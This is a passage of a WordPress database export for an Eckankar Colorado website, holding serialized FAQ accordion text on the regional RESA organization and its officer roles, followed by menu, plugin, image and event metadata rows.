of newcomers and chelas. The RESA program lets people unfold. By their example and by their talents chelas can show and express the living ECK through themselves. This is one of the very strong points of the RESA program. It gives a way for initiates to serve in ECKANKAR where their talents are called for. They can offer these talents so they can grow. The people around them can also unfold by watching the example of their fellow ECKists who are now having a chance to show their skills in a certain area. The future growth of ECKANKAR will come because of the information you pass up through the channels to the RESA and thus on to the ECKANKAR Spiritual Center.</p>\";}i:1;a:4:{s:15:\"accordion_title\";s:75:\"Who is the leader of the Colorado RESA organization and what is their role?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:651:\"<p>The RESA (Regional ECK Spiritual Aide) is appointed by the Mahanta, the Living ECK Master, and serves for a one year appointment beginning on October 22nd of each year.</p>\r\n<p><strong>The role of the RESA is primarily three fold:</strong></p>\r\n<ol>\r\n	<li>To assist the Living ECK Master, in his mission: To find better ways of bringing the message of Light and Sound to all who are ready for it.</li>\r\n	<li>To insure the message of ECK is presented within the guidelines of ECKANKAR as established by the Living ECK Master.</li>\r\n	<li>To act as the local delegate of the Living ECK Master on all matters affecting ECKANKAR in Colorado.</li>\r\n</ol>\";}i:2;a:4:{s:15:\"accordion_title\";s:69:\"Does the RESA or the Colorado Satsang Society have an advisory board?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:566:\"<p><strong>A Board of Trustees is appointed by the RESA to assist in two primary ways:</strong></p>\r\n<ol>\r\n	<li>They support the RESA and the direction of ECKANKAR as set by Sri Harold Klemp</li>\r\n	<li>They help the RESA insure that the Satsang Society’s legal and financial decisions are sound. The Trustees are appointed by, and report directly to, the RESA and serve for a renewable one year term. A Secretary is responsible for keeping accurate records of all actions and decisions of the Board and keeps the legal documents of the Satsang Society.</li>\r\n</ol>\";}i:3;a:4:{s:15:\"accordion_title\";s:85:\"Does the Colorado Satsang Society have a President and what are the responsibilities?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1667:\"<p><strong>The President’s purpose is primarily two fold:</strong></p>\r\n<ol>\r\n	<li>To be the RESA’s primary assistant in Satsang Society affairs.</li>\r\n	<li>To be the chief executive officer of the Satsang Society.</li>\r\n</ol>\r\n<p><strong>The responsibilities are:</strong></p>\r\n<ul>\r\n	<li>To appoint the state directors and the Local Area Directors (with the RESA’s approval);</li>\r\n	<li>Oversee the training of individuals in these positions.</li>\r\n	<li>Propose plans for the state Satsang Society to the RESA based upon input from the state directors and Local Directors.</li>\r\n	<li>Maintain communication and support for the Vahana team leader.</li>\r\n	<li>Oversee the Regional Seminar, HI Retreat, Youth Retreat and other Satsang Society events and programs including the</li>\r\n	<li>Colorado web site (www.Eckankar-Colorado.org) and the electronic mail distribution system.</li>\r\n	<li>Carry out the legal and financial responsibilities and reporting of the Satsang Society to local government and to ECKANKAR.</li>\r\n	<li>Say “yes” to chelas as often as possible, working with them so their ideas meet ECKANKAR guidelines.</li>\r\n	<li>Support chelas’ willingness to serve the ECK and take part in the outer works of ECK.</li>\r\n</ul>\r\n<p> The President is nominated by the RESA for approval by the Board of Trustees and serves a mutually renewable term of one year. The President reports directly to the RESA and to the Board of Trustees. The Vice President, Vahana team leader, CFO, Youth and Family Director, Spiritual Services Director, Administrative Services Director, Web Site Director and each of the Local Directors report to the President.</p>\";}i:4;a:4:{s:15:\"accordion_title\";s:39:\"What is the role of the Vice President?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:299:\"<p>The Vice President’s role is to assist the President in creating, planning and managing the action plans to accomplish the goals set forth by the RESA. This is a new position created in Colorado, nominated by the RESA and confirmed by the Board of Trustees, and serves for a one year term. </p>\";}i:5;a:4:{s:15:\"accordion_title\";s:142:\"Since sharing the teachings with the public and new spiritual seekers is so important, is there someone specifically assisting in this regard?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:973:\"<p>The Colorado Vahana team leader is charged with finding effective ways to reach interested seekers with the teachings of ECK in the state. Their primary responsibilities are:</p>\r\n<ul>\r\n	<li>To appoint a Colorado regional Vahana team with RESA approval.</li>\r\n	<li>Assign tasks among team members according to their strengths, talents, and desires to share ECK with the public on a regular basis.</li>\r\n	<li>Submit a regional Vahana budget for each year.</li>\r\n	<li>Work with local Vahana teams, with assistance from the regional teams.</li>\r\n	<li>Assess and report Vahana results.</li>\r\n	<li>File a semiannual report with the RESA which is forwarded to the ESC.</li>\r\n	<li>Communicate with other members of the Satsang Society.</li>\r\n	<li>Work with and develop future Vahanas.</li>\r\n</ul>\r\n<p>This position is filled by the RESA, and reports directly to her with communication to the President. This position has a one year term with mutual agreement with the RESA.</p>\";}i:6;a:4:{s:15:\"accordion_title\";s:61:\"How is the money handled? Is there a Chief Financial Officer?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1418:\"<p>ECKANKAR is a federally recognized “501 (c) (3)” tax-exempt organization operating as a “church”. Since 1987 the Colorado Satsang Society has been a Chartered Affiliate of ECKANKAR, and as such, operates under ECKANKAR’s larger federal umbrella. All of our financial accounting, recording keeping and reporting must therefore be in compliance with Federal IRS guidelines. To this end, the Chief Financial Officer is responsible for following proper accounting of the financial resources of the Satsang Society and to assist with management of its assets. They keep an accounting system that follows the guidelines of ECKANKAR, the Charter, and the laws and regulations of the nation, the state of Colorado, and the various counties and municipalities in which we operate.</p>\r\n<p>The CFO Position Duties</p>\r\n<ul>\r\n	<li>Oversees the budget process for each of the service areas, making sure the budgets are followed and documentation is retained.</li>\r\n	<li>Submits a semiannual financial report to the President which is forwarded to the ESC.</li>\r\n	<li>Maintains the board approved investments of the Satsang Society under the direction of the President and the Board.</li>\r\n	<li>Maintains liability and property insurance premiums for potential legal concerns. The CFO serves for a one year, mutually renewable term, and is supported by an Assistant CFO who serves under the same condition.</li>\r\n</ul>\";}i:7;a:4:{s:15:\"accordion_title\";s:75:\"Does the Colorado Satsang Society have a provision for assisting the youth?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:621:\"<p>The State Youth and Family Director has three primary responsibilities:</p>\r\n<ol>\r\n	<li>To champion spiritual education programs for youth, young adults, and families in ECK, giving recommendations to, and working in collaboration with, the appropriate service directors and coordinators in each of the areas of the state.</li>\r\n	<li>To involve ECK youth, young adults, and families in ECK events in the region.</li>\r\n	<li>To cultivate and encourage opportunities for unfoldment, leadership, and service for the future leaders of ECKANKAR. This position, as well, has a mutually renewable term of one year.</li>\r\n</ol>\";}i:8;a:4:{s:15:\"accordion_title\";s:93:\"Since ECKANKAR is a spiritual organization, is there a state position for Spiritual Services?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1979:\"<p>The State Spiritual Services Director is charged with providing activities that serve the spiritual needs of chelas and newcomers in the region such as:</p>\r\n<ul>\r\n	<li>ECK Worship Services and Community HU Songs.</li>\r\n	<li>ECKANKAR classes including adult and youth Satsang classes, book discussion classes, ECK-periodical discussion classes, and special interest group circles.</li>\r\n	<li>Other ECK events including HU Chants, RoundTables, and Harji Dinners, H.I Retreats and trainings.</li>\r\n	<li>Trainings which include Arahata Training, Spiritual Duties of the ECK High Initiate, Spiritual Duties of the ECK Volunteer, and Handbook for ECK Leaders training.</li>\r\n	<li>Publications such as brochures, posters, programs, graphics and descriptions of ECK programs. This one year term is a mutually renewable position.</li>\r\n</ul>\r\n<p>Colorado has created 4 additional positions under the Spiritual Services Director to assist in these duties. </p>\r\n<ol>\r\n	<li>The <strong>Database Coordinator</strong> maintains a confidential, computerized list and system of contacting chelas to inform them of Satsang Society events. This is a one year term renewable position.</li>\r\n	<li>State <strong>Spiritual Training Director</strong> oversees and supports training events designed to teach or enhance spiritual skills. This is also a one year term renewable position.</li>\r\n	<li><strong>State Classes Director</strong> is responsible for overseeing and supporting the needs of all ECK classes. This director also approves the formation of on-line ECK book discussion classes and on-line Arahatas for such discussions. This is a one year term renewable position.</li>\r\n	<li><strong>State Communications Director</strong> is responsible for enhancing and supporting intra-organizational communication between chelas in a local area or statewide. This will include personal communication, voice messaging, telephone trees, etc. This is a one year term renewable position.</li>\r\n</ol>\";}i:9;a:4:{s:15:\"accordion_title\";s:43:\"How are the local ECK Centers administered?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:752:\"<p>While the local ECK Centers are used for local meetings and activities under the purview of the Local Director, the state Administrative Services Director’s responsibilities include guiding and supporting the physical operation of the ECK Centers, working with the ECK Materials Coordinators to maintain chela and public material inventories, managing equipment and furniture. This would include keeping copies of leases, insurance policies, maintenance contracts, legal licenses & permits, state registrations, telephone system administration and billing, and advising the ESC of any substantial location or legal changes and supervising and supporting any fundraising projects on a regional basis. This is a one year term renewable position.</p>\";}i:10;a:4:{s:15:\"accordion_title\";s:131:\"As technology and the internet grows, how does the Colorado web site support the Mahanta’s mission and the local Colorado chelas?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:1230:\"<p>The Colorado web site at www.Eckankar-Colorado.org is continually expanding it’s capabilities and uses. It has two primary purposes:</p>\r\n<ol>\r\n	<li>Reaching out to the public as a Vahana tool.</li>\r\n	<li>Providing a news, information and communication tool for the chelas.</li>\r\n</ol>\r\n<p>Much of the site is based on “Search Engine Optimization” and is designed to invite the public into an exposure to the ECK teachings as we provide answers to their net search queries. While the main ECKANKAR web site at www.Eckankar-Colorado.org continues to be the primary source for information about the ECK teachings, the Colorado web site will allow the public to meet us as individuals and a community so they can have a first hand experience with potential friends that demonstrate the personal and daily benefits of a life lived in ECK.</p>\r\n<p>The second objective will be to enhance and improve communication within the Satsang Society organization by use of a group communication software that can keep the entire state membership receiving regular news bulletins, calendars, event publicity and materials as well as potentially helping groups as small as a three person team communicate via one central focal point.</p>\";}i:11;a:4:{s:15:\"accordion_title\";s:84:\"In the local areas, what does a Local Director do and what are they responsible for?\";s:20:\"accordion_title_icon\";s:14:\"fa-info-circle\";s:18:\"enable_single_icon\";s:3:\"yes\";s:14:\"accordion_desc\";s:2141:\"<p>The purpose of the Local Director position is two fold:</p>\r\n<ul>\r\n	<li>To encourage, support, and coordinate ECK activities in the local area for seekers and for chelas</li>\r\n	<li>To facilitate a loving and harmonious environment in the local area.</li>\r\n</ul>\r\n<p>The Local Director’s responsibilities include:<strong><br />\r\n</strong></p>\r\n<ul>\r\n	<li>Encourage and support efforts of the Vahana teams(s) under the direction of the state and local Vahana team leaders, offering assistance and serving as an information resource to the chelas.</li>\r\n	<li>Encourage and support local activities that nurture chelas in their spiritual growth<strong>.</strong></li>\r\n	<li>Maintain harmony and good communication among the local ECK leaders by coordinating plans and activities of the local coordinators and making decisions when there is no consensus in the local area between coordinators.  (S)he will insure that reports from the local coordinators are forwarded to the President; insure that copies of reports are sent to the appropriate state services directors; stay in communication with the ECK Center coordinator and the ECK materials coordinator.</li>\r\n</ul>\r\n<p>Additionally, (s)he will make recommendations to the President about chelas who could serve in leadership positions;  support and train chelas who wish to help in the local area; see that the Satsang Society’s local files and accountings are accurate and up-to-date; follow the principles and doctrines of ECK in carrying out responsibilities; understand and follow the guidance in the ECKANKAR guidelines and <em>Handbook for ECK Leaders</em>; say “yes” to chelas as often as possible when working with them so their projects meet ECKANKAR guidelines.</p>\r\n<p>The Local Director is supported on a local level by their team of volunteers that assist as Local Administrative Services coordinator, Local Spiritual Services coordinator, Local Web Information  coordinator, Local Treasurer, Local Vahana coordinator, and Local Youth and Family coordinator. Each of these positions replicate the responsibilities of the state directors, but on a local level.</p>\";}}\";'),(27223,184289,'_wp_attached_file','2019/10/RESA-Org-Chart-9.22.18.pdf'),(27224,184313,'_wp_attached_file','2019/10/RESA-and-ETC-Org-Charts.pdf'),(6642,79365,'wpsm_accordion_count','12'),(6643,79365,'Accordion_Settings','s:566:\"a:18:{s:13:\"acc_sec_title\";s:2:\"no\";s:10:\"op_cl_icon\";s:3:\"yes\";s:14:\"acc_title_icon\";s:3:\"yes\";s:10:\"acc_radius\";s:3:\"yes\";s:10:\"acc_margin\";s:3:\"yes\";s:15:\"acc_op_cl_align\";s:5:\"right\";s:13:\"enable_toggle\";s:2:\"no\";s:16:\"enable_ac_border\";s:3:\"yes\";s:13:\"expand_option\";s:1:\"3\";s:9:\"ac_styles\";s:1:\"2\";s:16:\"acc_title_bg_clr\";s:7:\"#E8E8E8\";s:18:\"acc_title_icon_clr\";s:7:\"#333333\";s:15:\"acc_desc_bg_clr\";s:7:\"#ffffff\";s:17:\"acc_desc_font_clr\";s:7:\"#000000\";s:10:\"title_size\";s:0:\"\";s:8:\"des_size\";s:0:\"\";s:11:\"font_family\";s:9:\"Open Sans\";s:10:\"custom_css\";s:0:\"\";}\";'),(6644,79365,'boldgrid_hide_page_title','1'),(6645,79666,'_edit_lock','1693414218:2'),(6646,79666,'_edit_last','2'),(6647,79666,'_wp_page_template','default'),(6648,79666,'_wpac_is_members_only','true'),(6649,79666,'_wpac_members_redirect_to',''),(6650,79666,'_wpac_show_in_search','0'),(6651,79666,'_wpac_show_excerpt_in_search','0'),(6652,79666,'_wpac_nonmembers_redirect_to',''),(6653,79666,'boldgrid_hide_page_title','0'),(6654,79666,'boldgrid_in_page_containers','1'),(6655,79666,'bgseo_robots_index','index'),(6656,79666,'bgseo_robots_follow','follow'),(6771,80983,'_wp_attached_file','2019/08/moon-grass.jpg'),(8332,109544,'_nav_menu_role','in'),(8322,109544,'_menu_item_classes','a:57:{i:0;s:0:\"\";i:1;s:13:\"nmr-logged-in\";i:2;s:13:\"nmr-logged-in\";i:3;s:13:\"nmr-logged-in\";i:4;s:13:\"nmr-logged-in\";i:5;s:13:\"nmr-logged-in\";i:6;s:13:\"nmr-logged-in\";i:7;s:13:\"nmr-logged-in\";i:8;s:13:\"nmr-logged-in\";i:9;s:13:\"nmr-logged-in\";i:10;s:13:\"nmr-logged-in\";i:11;s:13:\"nmr-logged-in\";i:12;s:13:\"nmr-logged-in\";i:13;s:13:\"nmr-logged-in\";i:14;s:13:\"nmr-logged-in\";i:15;s:13:\"nmr-logged-in\";i:16;s:13:\"nmr-logged-in\";i:17;s:13:\"nmr-logged-in\";i:18;s:13:\"nmr-logged-in\";i:19;s:13:\"nmr-logged-in\";i:20;s:13:\"nmr-logged-in\";i:21;s:13:\"nmr-logged-in\";i:22;s:13:\"nmr-logged-in\";i:23;s:13:\"nmr-logged-in\";i:24;s:13:\"nmr-logged-in\";i:25;s:13:\"nmr-logged-in\";i:26;s:13:\"nmr-logged-in\";i:27;s:13:\"nmr-logged-in\";i:28;s:13:\"nmr-logged-in\";i:29;s:13:\"nmr-logged-in\";i:30;s:13:\"nmr-logged-in\";i:31;s:13:\"nmr-logged-in\";i:32;s:13:\"nmr-logged-in\";i:33;s:13:\"nmr-logged-in\";i:34;s:13:\"nmr-logged-in\";i:35;s:13:\"nmr-logged-in\";i:36;s:13:\"nmr-logged-in\";i:37;s:13:\"nmr-logged-in\";i:38;s:13:\"nmr-logged-in\";i:39;s:13:\"nmr-logged-in\";i:40;s:13:\"nmr-logged-in\";i:41;s:13:\"nmr-logged-in\";i:42;s:13:\"nmr-logged-in\";i:43;s:13:\"nmr-logged-in\";i:44;s:13:\"nmr-logged-in\";i:45;s:13:\"nmr-logged-in\";i:46;s:13:\"nmr-logged-in\";i:47;s:13:\"nmr-logged-in\";i:48;s:13:\"nmr-logged-in\";i:49;s:13:\"nmr-logged-in\";i:50;s:13:\"nmr-logged-in\";i:51;s:13:\"nmr-logged-in\";i:52;s:13:\"nmr-logged-in\";i:53;s:13:\"nmr-logged-in\";i:54;s:13:\"nmr-logged-in\";i:55;s:13:\"nmr-logged-in\";i:56;s:13:\"nmr-logged-in\";}'),(8323,109544,'_menu_item_xfn',''),(8324,109544,'_menu_item_url',''),(8321,109544,'_menu_item_target',''),(8320,109544,'_menu_item_object','page'),(8319,109544,'_menu_item_object_id','33361'),(8318,109544,'_menu_item_menu_item_parent','108956'),(8317,109544,'_menu_item_type','post_type'),(8327,109543,'_nav_menu_role','in'),(8315,109543,'_menu_item_url',''),(8314,109543,'_menu_item_xfn',''),(8313,109543,'_menu_item_classes','a:57:{i:0;s:0:\"\";i:1;s:13:\"nmr-logged-in\";i:2;s:13:\"nmr-logged-in\";i:3;s:13:\"nmr-logged-in\";i:4;s:13:\"nmr-logged-in\";i:5;s:13:\"nmr-logged-in\";i:6;s:13:\"nmr-logged-in\";i:7;s:13:\"nmr-logged-in\";i:8;s:13:\"nmr-logged-in\";i:9;s:13:\"nmr-logged-in\";i:10;s:13:\"nmr-logged-in\";i:11;s:13:\"nmr-logged-in\";i:12;s:13:\"nmr-logged-in\";i:13;s:13:\"nmr-logged-in\";i:14;s:13:\"nmr-logged-in\";i:15;s:13:\"nmr-logged-in\";i:16;s:13:\"nmr-logged-in\";i:17;s:13:\"nmr-logged-in\";i:18;s:13:\"nmr-logged-in\";i:19;s:13:\"nmr-logged-in\";i:20;s:13:\"nmr-logged-in\";i:21;s:13:\"nmr-logged-in\";i:22;s:13:\"nmr-logged-in\";i:23;s:13:\"nmr-logged-in\";i:24;s:13:\"nmr-logged-in\";i:25;s:13:\"nmr-logged-in\";i:26;s:13:\"nmr-logged-in\";i:27;s:13:\"nmr-logged-in\";i:28;s:13:\"nmr-logged-in\";i:29;s:13:\"nmr-logged-in\";i:30;s:13:\"nmr-logged-in\";i:31;s:13:\"nmr-logged-in\";i:32;s:13:\"nmr-logged-in\";i:33;s:13:\"nmr-logged-in\";i:34;s:13:\"nmr-logged-in\";i:35;s:13:\"nmr-logged-in\";i:36;s:13:\"nmr-logged-in\";i:37;s:13:\"nmr-logged-in\";i:38;s:13:\"nmr-logged-in\";i:39;s:13:\"nmr-logged-in\";i:40;s:13:\"nmr-logged-in\";i:41;s:13:\"nmr-logged-in\";i:42;s:13:\"nmr-logged-in\";i:43;s:13:\"nmr-logged-in\";i:44;s:13:\"nmr-logged-in\";i:45;s:13:\"nmr-logged-in\";i:46;s:13:\"nmr-logged-in\";i:47;s:13:\"nmr-logged-in\";i:48;s:13:\"nmr-logged-in\";i:49;s:13:\"nmr-logged-in\";i:50;s:13:\"nmr-logged-in\";i:51;s:13:\"nmr-logged-in\";i:52;s:13:\"nmr-logged-in\";i:53;s:13:\"nmr-logged-in\";i:54;s:13:\"nmr-logged-in\";i:55;s:13:\"nmr-logged-in\";i:56;s:13:\"nmr-logged-in\";}'),(8312,109543,'_menu_item_target',''),(8310,109543,'_menu_item_object_id','33553'),(8309,109543,'_menu_item_menu_item_parent','108956'),(8308,109543,'_menu_item_type','post_type'),(8326,109542,'_nav_menu_role','in'),(8305,109542,'_menu_item_xfn',''),(8306,109542,'_menu_item_url',''),(8304,109542,'_menu_item_classes','a:57:{i:0;s:0:\"\";i:1;s:13:\"nmr-logged-in\";i:2;s:13:\"nmr-logged-in\";i:3;s:13:\"nmr-logged-in\";i:4;s:13:\"nmr-logged-in\";i:5;s:13:\"nmr-logged-in\";i:6;s:13:\"nmr-logged-in\";i:7;s:13:\"nmr-logged-in\";i:8;s:13:\"nmr-logged-in\";i:9;s:13:\"nmr-logged-in\";i:10;s:13:\"nmr-logged-in\";i:11;s:13:\"nmr-logged-in\";i:12;s:13:\"nmr-logged-in\";i:13;s:13:\"nmr-logged-in\";i:14;s:13:\"nmr-logged-in\";i:15;s:13:\"nmr-logged-in\";i:16;s:13:\"nmr-logged-in\";i:17;s:13:\"nmr-logged-in\";i:18;s:13:\"nmr-logged-in\";i:19;s:13:\"nmr-logged-in\";i:20;s:13:\"nmr-logged-in\";i:21;s:13:\"nmr-logged-in\";i:22;s:13:\"nmr-logged-in\";i:23;s:13:\"nmr-logged-in\";i:24;s:13:\"nmr-logged-in\";i:25;s:13:\"nmr-logged-in\";i:26;s:13:\"nmr-logged-in\";i:27;s:13:\"nmr-logged-in\";i:28;s:13:\"nmr-logged-in\";i:29;s:13:\"nmr-logged-in\";i:30;s:13:\"nmr-logged-in\";i:31;s:13:\"nmr-logged-in\";i:32;s:13:\"nmr-logged-in\";i:33;s:13:\"nmr-logged-in\";i:34;s:13:\"nmr-logged-in\";i:35;s:13:\"nmr-logged-in\";i:36;s:13:\"nmr-logged-in\";i:37;s:13:\"nmr-logged-in\";i:38;s:13:\"nmr-logged-in\";i:39;s:13:\"nmr-logged-in\";i:40;s:13:\"nmr-logged-in\";i:41;s:13:\"nmr-logged-in\";i:42;s:13:\"nmr-logged-in\";i:43;s:13:\"nmr-logged-in\";i:44;s:13:\"nmr-logged-in\";i:45;s:13:\"nmr-logged-in\";i:46;s:13:\"nmr-logged-in\";i:47;s:13:\"nmr-logged-in\";i:48;s:13:\"nmr-logged-in\";i:49;s:13:\"nmr-logged-in\";i:50;s:13:\"nmr-logged-in\";i:51;s:13:\"nmr-logged-in\";i:52;s:13:\"nmr-logged-in\";i:53;s:13:\"nmr-logged-in\";i:54;s:13:\"nmr-logged-in\";i:55;s:13:\"nmr-logged-in\";i:56;s:13:\"nmr-logged-in\";}'),(8302,109542,'_menu_item_object','page'),(8301,109542,'_menu_item_object_id','33457'),(8300,109542,'_menu_item_menu_item_parent','108956'),(8299,109542,'_menu_item_type','post_type'),(143925,265198,'mec_op','a:0:{}'),(143902,265198,'mec_certain_weekdays','a:0:{}'),(143903,265198,'mec_allday','0'),(143904,265198,'mec_hide_time','0'),(143905,265198,'mec_hide_end_time','0'),(143906,265198,'mec_comment',''),(143907,265198,'mec_repeat_status','0'),(143908,265198,'mec_repeat_type',''),(143909,265198,'mec_repeat_interval','1'),(143910,265198,'mec_repeat_end',''),(143911,265198,'mec_repeat_end_at_occurrences',''),(143912,265198,'mec_repeat_end_at_date',''),(143913,265198,'mec_advanced_days','a:0:{}'),(143914,265198,'mec_in_days',''),(143915,265198,'mec_not_in_days',''),(143916,265198,'mec_hourly_schedules','a:0:{}'),(143917,265198,'mec_booking','a:0:{}'),(143918,265198,'mec_tickets','a:0:{}'),(143919,265198,'mec_fees_global_inheritance','1'),(143920,265198,'mec_fees','a:0:{}'),(143921,265198,'mec_ticket_variations_global_inheritance','1'),(143922,265198,'mec_ticket_variations','a:0:{}'),(143923,265198,'mec_reg_fields_global_inheritance','1'),(143924,265198,'mec_reg_fields','a:0:{}'),(6772,80983,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:22:\"2019/08/moon-grass.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"moon-grass-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"moon-grass-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"moon-grass-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"moon-grass-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"moon-grass-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:22:\"moon-grass-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:22:\"moon-grass-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:22:\"moon-grass-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:22:\"moon-grass-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:22:\"moon-grass-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:22:\"moon-grass-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:22:\"moon-grass-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"moon-grass-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:22:\"moon-grass-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:23:\"moon-grass-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8311,109543,'_menu_item_object','page'),(143901,265198,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(143858,265160,'original-file','2021/06/hiking-path-1-updraft-pre-smush-original.jpg'),(143851,265166,'passster_activate_global_protection',NULL),(143852,265166,'passster_activate_protection',NULL),(143853,265166,'passster_protection_type','password'),(143854,265167,'original-file','2021/06/dreaming-2-updraft-pre-smush-original.jpg'),(143855,265167,'smush-complete','1'),(143856,265167,'smush-info','The file was compressed from 34.87 KB to 33.99 KB saving 2.52 percent using WP-Optimize'),(143857,265167,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35704;s:12:\"smushed-size\";i:34805;s:15:\"savings-percent\";d:2.520000000000000017763568394002504646778106689453125;}'),(8303,109542,'_menu_item_target',''),(8210,108956,'_menu_item_target',''),(24924,132183,'popup_theme_data_version','3'),(6897,70160,'_wc_gallery_custom_image_link',''),(6898,70160,'_edit_last','2'),(6901,91821,'_edit_lock','1641577076:2'),(6902,91821,'_edit_last','2'),(6903,91821,'_wp_page_template','default'),(6904,91821,'_wpac_members_redirect_to',''),(6905,91821,'_wpac_show_in_search','0'),(6906,91821,'_wpac_show_excerpt_in_search','0'),(6907,91821,'_wpac_nonmembers_redirect_to',''),(6908,91821,'boldgrid_hide_page_title','0'),(6909,91821,'boldgrid_in_page_containers','1'),(6910,91821,'bgseo_robots_index','index'),(6911,91821,'bgseo_robots_follow','follow'),(8213,108956,'_menu_item_url','https://eckankar-colorado.org/members-page/'),(8212,108956,'_menu_item_xfn',''),(8211,108956,'_menu_item_classes','a:57:{i:0;s:0:\"\";i:1;s:13:\"nmr-logged-in\";i:2;s:13:\"nmr-logged-in\";i:3;s:13:\"nmr-logged-in\";i:4;s:13:\"nmr-logged-in\";i:5;s:13:\"nmr-logged-in\";i:6;s:13:\"nmr-logged-in\";i:7;s:13:\"nmr-logged-in\";i:8;s:13:\"nmr-logged-in\";i:9;s:13:\"nmr-logged-in\";i:10;s:13:\"nmr-logged-in\";i:11;s:13:\"nmr-logged-in\";i:12;s:13:\"nmr-logged-in\";i:13;s:13:\"nmr-logged-in\";i:14;s:13:\"nmr-logged-in\";i:15;s:13:\"nmr-logged-in\";i:16;s:13:\"nmr-logged-in\";i:17;s:13:\"nmr-logged-in\";i:18;s:13:\"nmr-logged-in\";i:19;s:13:\"nmr-logged-in\";i:20;s:13:\"nmr-logged-in\";i:21;s:13:\"nmr-logged-in\";i:22;s:13:\"nmr-logged-in\";i:23;s:13:\"nmr-logged-in\";i:24;s:13:\"nmr-logged-in\";i:25;s:13:\"nmr-logged-in\";i:26;s:13:\"nmr-logged-in\";i:27;s:13:\"nmr-logged-in\";i:28;s:13:\"nmr-logged-in\";i:29;s:13:\"nmr-logged-in\";i:30;s:13:\"nmr-logged-in\";i:31;s:13:\"nmr-logged-in\";i:32;s:13:\"nmr-logged-in\";i:33;s:13:\"nmr-logged-in\";i:34;s:13:\"nmr-logged-in\";i:35;s:13:\"nmr-l